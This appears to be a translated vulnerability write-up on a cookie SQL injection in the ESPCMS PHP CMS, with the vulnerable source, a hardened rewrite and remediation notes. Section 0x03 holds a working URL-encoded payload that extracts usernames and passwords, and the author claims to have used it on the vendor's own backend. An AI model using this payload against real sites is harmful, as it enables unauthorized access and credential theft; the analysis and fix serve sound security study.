ESPCMS latest cookie Injection Vulnerability Analysis

Source: Internet
Author: User

0x00 Introduction:
Yisi ESPCMS is an enterprise website management system built on the LAMP stack. It is easy to operate, powerful, stable, scalable and secure, and is convenient for secondary development and later maintenance, so it helps you build a powerful, professional enterprise website quickly and easily.
0x01 Vulnerability Analysis:
    function in_list() {
        parent::start_pagetemplate();
        $lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
        $cartid = $this->fun->accept('ecisp_order_list', 'C'); // reads cookies['ecisp_order_list']
        $cartid = stripslashes(htmlspecialchars_decode($cartid));
        $uncartid = !empty($cartid) ? unserialize($cartid) : 0; // $cartid must be in a specific (serialized) format
        if ($uncartid && is_array($uncartid)) {
            $didarray = $this->fun->key_array_name($uncartid, 'did', 'amount');
            $didlist = $this->fun->format_array_text(array_keys($didarray), ',');
            if (!empty($didlist)) {
                $db_table = db_prefix . 'document';
                $db_where = "isclass = 1 AND isorder = 1 AND did in ($didlist) order by did DESC";
                $sql = "SELECT did, lng, pid, mid, aid, tid, sid, fgid, linkdid, isclass, islink, ishtml, ismess, isorder, purview, recommend, tsn, title, longtitle, color, author, source, pic, link, oprice, bprice, click, addtime, template, filename, filepath FROM $db_table WHERE $db_where"; // SQL statement built dynamically from $didlist
                $rs = $this->db->query($sql); // the value of cookies['ecisp_order_list'] reaches the query without any filtering: it is used directly to build the SQL statement, so this is a cookie injection
                // ... remainder of the function omitted in the original listing
            }
        }
    }
0x02 Difficulties:
The received cookies['ecisp_order_list'] value passes through htmlspecialchars_decode(), stripslashes(), unserialize(), key_array_name(), array_keys() and format_array_text() before it reaches the query.
stripslashes() means the injected statement is unaffected by GPC (magic quotes).
However, the use of unserialize() makes it harder to construct an exp: the value passed to unserialize() must be in a specific special format (in practice, I have not fully understood this special format).
I successfully constructed the exp by luck and a little skill, and will not elaborate on it here. You can print the return values of the functions above to work out the construction method (or use the exp below to find some patterns).
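To make the cookie-to-SQL path concrete, here is an added example that is not ESPCMS code: it reconstructs the flow of in_list() on a constructed cookie and sets it beside a hardened version that validates every did before it reaches the query. key_array_name() and format_array_text() are stand-ins written from how the listing calls them (the real ESPCMS helpers may differ), and both cookie values are constructed for the example, not captured from a real site.

```php
<?php
// Added example, not ESPCMS code: reconstructs the cookie-to-SQL path of
// in_list() and shows the same path with did values validated.
// key_array_name() and format_array_text() are stand-ins based on how the
// page calls them; the real ESPCMS helpers may differ.

// Stand-in for $this->fun->key_array_name($rows, 'did', 'amount'):
// maps each row's did to its amount.
function key_array_name(array $rows, string $keyField, string $valueField): array
{
    $out = [];
    foreach ($rows as $row) {
        if (is_array($row) && isset($row[$keyField]) && is_scalar($row[$keyField])) {
            $out[$row[$keyField]] = $row[$valueField] ?? null;
        }
    }
    return $out;
}

// Stand-in for $this->fun->format_array_text($items, ','): joins with a separator.
function format_array_text(array $items, string $sep): string
{
    return implode($sep, $items);
}

// Mirrors the vulnerable flow: whatever survives unserialize() is concatenated
// into the WHERE clause as-is. Returns the clause, or null when none is built.
function build_where_unsafe(string $cookie): ?string
{
    $cartid = stripslashes(htmlspecialchars_decode($cookie));
    $uncartid = !empty($cartid) ? @unserialize($cartid) : 0;
    if (!$uncartid || !is_array($uncartid)) {
        return null;
    }
    $didarray = key_array_name($uncartid, 'did', 'amount');
    $didlist  = format_array_text(array_keys($didarray), ',');
    if (empty($didlist)) {
        return null;
    }
    return "isclass = 1 AND isorder = 1 AND did in ($didlist) order by did DESC";
}

// Hardened flow: forbid object payloads in unserialize(), keep only positive
// integer ids, and pass them to the query as bound parameters.
// Returns [clause with placeholders, parameter list], or null.
function build_where_safe(string $cookie): ?array
{
    $cartid = stripslashes(htmlspecialchars_decode($cookie));
    if ($cartid === '') {
        return null;
    }
    $uncartid = @unserialize($cartid, ['allowed_classes' => false]);
    if (!is_array($uncartid)) {
        return null;
    }
    $ids = [];
    foreach (array_keys(key_array_name($uncartid, 'did', 'amount')) as $did) {
        // PHP already turns numeric-string keys into ints; anything else is rejected.
        if (is_int($did) && $did > 0) {
            $ids[] = $did;
        }
    }
    if ($ids === []) {
        return null;
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    return [
        "isclass = 1 AND isorder = 1 AND did IN ($placeholders) ORDER BY did DESC",
        $ids,
    ];
}

// Constructed sample cookies for the example (not captured from a real site).
$benign  = 'a:1:{s:3:"k23";a:2:{s:3:"did";s:2:"24";s:6:"amount";i:1;}}';
$tainted = 'a:1:{s:3:"k23";a:2:{s:3:"did";s:3:"24x";s:6:"amount";i:1;}}';

foreach ([$benign, $tainted] as $cookie) {
    var_dump(build_where_unsafe($cookie));
    var_dump(build_where_safe($cookie));
}
```

With the benign cookie both functions produce a list containing only 24. With the tainted cookie the unsafe path copies the string "24x" into the IN list verbatim, which is exactly how an attacker-controlled did reaches the query in the listing above, while the hardened path rejects it because the key is no longer an integer; allowed_classes => false additionally stops unserialize() from instantiating objects from cookie data.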
0x03 EXP:
a%3a1%3a%7bs%3a3%3a%22k23%22%3ba%3a2%3a%7bs%3a3%3a%22did%22%3bs%3a159%3a%2224)+and+1%3d2+union+select+1%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2cpassword%2cusername%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2c26%2c27%2c28%2c29%2c30%2c31+from+sources+where+1+in+(1%22%3bs%3a6%3a%22amount%22%3bi%3a1%3b%7d%7d
0x04 Usage:
To avoid lowering the bar for using this exp any further (it is already very low), the exploitation process is not shown step by step.
0x05 Demo:
Injecting to obtain administrator information: (screenshot not reproduced in this copy)
Official site backend: (screenshot not reproduced in this copy)
0x06 Ad Time:
Taoyuan magazine is accepting submissions on an ongoing basis; e-mail: lovelessyuyu353@qq.com